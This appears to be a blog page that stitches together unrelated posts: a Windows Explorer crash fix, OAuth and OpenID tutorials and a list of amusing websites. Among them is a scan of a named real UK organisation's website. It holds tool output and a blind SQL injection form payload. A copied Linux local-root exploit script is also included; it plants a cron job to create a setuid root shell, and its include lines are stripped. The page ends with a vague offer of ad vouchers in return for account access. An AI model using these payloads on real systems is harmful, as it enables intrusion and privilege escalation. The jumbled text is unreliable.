Microsoft Error 1000 Win7 Explorer 6.1

 

If you experience an problem with Windows explorer, crashing (restarting) and “checking for solutions” frequently, please check your event log (start menu – Control Panel\All Control Panel Items\Administrative Tools\event viewer) and check your system for details:

Error 1000

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0×1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:\Windows\explorer.exe
Faulting module path: C:\Program Files\DivX\DivX Plus Media Foundation Components\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary Solution – Uninstall Divx

As you can see, the problem can easily be rectified, but only if you know what your doing. The conflicting / manifested dll or other file, could be malware or linked to a bigger program.

p.s this error had to be placed here as the Microsoft site has changed to only promote bug reports on, evaluating software only

Vulnerability found in http://nnc.co.uk

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

Index.php Header contains a expireiry date that has long been and gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>

Blindsqli in captcha!

During a few scans with backtrack, heres a vulnerability I found it their site, This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Exported HTTP Request from W3AF</title>
    </head>
    <body><form action="http://ncc.co.uk/index.php" method="POST">
<label>
website</label>
<input type="text" name="website" value="http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I’m home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>

19 Items found, to be suspected vulnerabilities

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
—————————————————————————
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
—————————————————————————
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1′, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
—————————————————————————
+ 1 host(s) tested

Exploit Title: Linux 3.x.x Executable File Read Exploit

# Date: 6/26/12
# Version: 3.x.x
# Category:: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + effected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others …
# ~
# Use this at your own risk, I’m not responsible for any risk.
# sorchfox@hotmail.com

cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include

char *payload=”\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n”;

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir(“/etc/cron.d”);
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system(“/bin/sh”);
system(“rm -rf /tmp/s”);
system(“rm -rf /etc/cron.d/*”);
return 0;
}
__EOF__
echo “wait aprox 4 min to get sh”
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

2-legged vs. 3-legged OAuth

From emails I receive it seems like there is a bit of confusion about what the terms 2-legged OAuth and 3-legged OAuth mean. I hope I can clear up this confusion with this article (and don’t contribute more to the confusion…).
In short, they describe two different usage scenarios of OAuth involving two respectively three parties.
3-legged OAuth describes the scenario for which OAuth was originally developed: a resource owner wants to give a client access to a server without sharing his credentials (i.e. username/password). A typical example is a user (resource owner) who wants to give a third-party application (client) access to his Twitter account (server).
On a conceptual level it works in the following way:
Client has signed up to the server and got his client credentials (also known as “consumer key and secret”) ahead of time
User wants to give the client access to his protected resources on the server
Client retrieves the temporary credentials (also known as “request token”) from the server
Client redirects the resource owner to the server
Resource owner grants the client access to his protected resources on the server
Server redirects the user back to the client
Client uses the temporary credentials to retrieve the token credentials (also known as “access token”) from the server
Client uses the token credentials to access the protected resources on the server
2-legged OAuth , on the other hand, describes a typical client-server scenario, without any user involvement. An example for such a scenario could be a local Twitter client application accessing your Twitter account.
On a conceptual level 2-legged OAuth simply consists of the first and last steps of 3-legged OAuth:
Client has signed up to the server and got his client credentials (also known as “consumer key and secret”)
Client uses his client credentials (and empty token credentials) to access the protected resources on the server
Above I used Twitter as an example, though strictly speaking, they don’t use 2-legged OAuth, but a variant of it. They not only provide the client credentials but also the token credentials (see also Using one access token with OAuth ).
As you have seen, 2-legged OAuth is nothing new, it is simply using OAuth in a different scenario than it was designed for. And hence you can use (almost?) all existing OAuth libraries for 2-legged OAuth, too.

53.500777 -2.077215

Create an HTML5 Game, Win $30k and a Trip to GDC/SF

http://feedproxy.google.com/~r/readwriteweb/hack/~3/DSIyH9E_nV8/create-an-html5-game-win-30k-a.php

Google OpenID Authentication In Your ASP.NET With DotNetOpenAuth

 

 

To secure websites, we usually create user database and develop a login page to authenticate the user. If you have several websites, creating separate user login for each site is time consuming and not favorable to your users because they have to login to each site separately. OpenID was developed to solved such authentication hassles. It is an open standard for developers that enables them to authenticate their users in a decentralized manner. For end-users, OpenID allows them to consolidate their digital identities. Major web services that supports OpenID are Google, Yahoo and Facebook. If you use OpenID with your website, you allow users to login to your site using their Google, Yahoo or Facebook accounts. The authentication will be hosted by the OpenID provider, so no need to maintain the user details on your side except the Identifier returned by the provider.On this article, I will show you a ASP.NET sample code I made that use OpenID Authentication to verify Google Account. To accomplish the authentication, I used the C# library called DotNetOpenAuth. Here is the step-by-step procedure to implement it on your ASP.NET application. 

1. Download the DotNetOpenAuth  Libraries. Choose the most appropriate version for development platform.
2. Extract the downloaded compressed file on your hard drive.
3. On your project, Add Reference to “DotNetOpenAuth.dll”
4. On your login page’s HTML Code, paste the following.

<form id=”form1″ runat=”server”> <div id=”loginform”> <div id=”NotLoggedIn” runat=”server”> Log in with <img src=”http://www.google.com/favicon.ico” /> <asp:Button ID=”btnLoginToGoogle” Runat=”server” Text=”Google” OnCommand=”OpenLogin_Click” CommandArgument=”https://www.google.com/accounts/o8/id” /> <asp:Label runat=”server” ID=”lblAlertMsg” /> </div> </div> </form>

Take note of the URL: https://www.google.com/accounts/o8/id – this is the unique OpenID URL of Google Account.   5. Include the following namespaces on your “Using” directive.

 

6. On the Page_Load & OpenLogin_Click, use the following codes

using DotNetOpenAuth.OpenId; using DotNetOpenAuth.OpenId.RelyingParty;

protected void Page_Load(object sender, EventArgs e) { OpenIdRelyingParty rp = new OpenIdRelyingParty(); var r = rp.GetResponse(); if (r != null) { switch (r.Status) { case AuthenticationStatus.Authenticated: NotLoggedIn.Visible = false; Session["GoogleIdentifier"] = r.ClaimedIdentifier.ToString(); Response.Redirect(“Main.aspx”); //redirect to main page of your website break; case AuthenticationStatus.Canceled: lblAlertMsg.Text = “Cancelled.”; break; case AuthenticationStatus.Failed: lblAlertMsg.Text = “Login Failed.”; break; } } }protected void OpenLogin_Click(object src, CommandEventArgs e) { string discoveryUri = e.CommandArgument.ToString(); OpenIdRelyingParty openid = new OpenIdRelyingParty(); var b = new UriBuilder(Request.Url) { Query = “” }; var req = openid.CreateRequest(discoveryUri, b.Uri, b.Uri); req.RedirectToProvider(); }

7. Run the project. It should look like the following screens.

Log in with Now the Login page look like ….

53.500777 -2.077215

My new avator

Facebook Fights Back, Says “Timeline” is a Commonly Used Word

http://feeds.techie-buzz.com/~r/techiebuzz/~3/Sef7PXotbec/facebook-says-timeline-is-a-generic-word.html

14 Unusual Websites To Kill Time With When Bored

How is the world on the other side you bored go-getters? I know that a time can come when you just don’t know what else to do? There comes a time in life when you just don’t want to go offline because you are addicted to the internet but you don’t know what to do because you seem to have surfed almost all of it. If you are still reading this then I am assuming that you are someone who will give up on their youth if not shown a way..err..to kill their precious time. Worry not. I will introduce you to some of the most amazing websites that provide a quick cure to boredom.

Neave

Paul Neave seems to have worked hard to come up with his share of amazing flash websites which is a collection of unique flash games to keep you engrossed.

Papervision3D

Tickle the fishes and they run away. Enjoy the under water life in this flash-based website and remember to tickle the shark out there. You might not get such a chance in real life.

Bio-Bak

One of the most bizarre ideas that could have hit a web designer. This website is the result of lots of hard work and planning. For you it will surely be fun and nice way to kill time.

Donnie Darko

You must have seen plenty of movie websites but none would have been planned the way this one was. The website is full of mysterious stuff and attracts the visitor. Though you might find it a bit slow when compared to the rest in this list but I guess that the movie was also mysterious and slow!

Google Gravity

This website does not have much to have fun with but it must be visited once. Especially those who always wanted Google to fall once. See your dream come true, almost!

Ball Droppings

Ball Droppings is an unusually engrossing flash-based game where you get to save lot of balls that keep popping up. I was lost in the website for almost 15 minutes when I realized that I have to wrap up this list.

Bank of Imagination

Bank of Imagination is a unique flash website where one can leave his/her own idea of what the world could be or anything else. Really, check the portal to see what all the world is imagining.

Salt Films

Salt Films had their website full of salt and still it tastes delicious. The creative animation and plenty of options will keep you busy for long.

Forgotten Bookmarks

Forgotten Bookmarks isn’t one of those flash-based web games but it surely has enough to keep you engrossed. See how far human imagination can go when it comes to designing bookmarks.

Bean Crusher

Did you ever think that crushing beans could be fun? Well, it will be once you visit this flash-based website. These beans will surely become tough to hit once you start moving ahead in-game.

Why Do You Stay Up So Late?

The question is obvious. Why do you stay up so late? The flash-based website is a blend of poetry and flash animation. Something that makes you fall in love with it.

The Infinite Oz

You know, I had this website open for almost an hour and it kept showing something or other that was of interest. The flash, the planning and the execution of this website is by far the best I have seen till now. Surreal.

Neon Bible

The interactive video can be attractive and might just catch you staring at it for long. Be warned!

Incredibox

Bored? How about you launch your own band. I mean, just for fun and just for sometime you surely can enjoy your own band. Right?

Conclusion

As a wrap-up, let me warn you that internet is full of stuff that can be interesting but of no use. These websites can be good for sometime but don’t spoil the important things that matter to you the most just because you were lost in these weirdly amazing websites.

53.500777 -2.077215

Google Engage

How would you like to receive free Google AdWords vouchers?

All you have to do is –

Have something to advertise

Authorise my access to make your life easier

And that’s it!

Contact me for more details.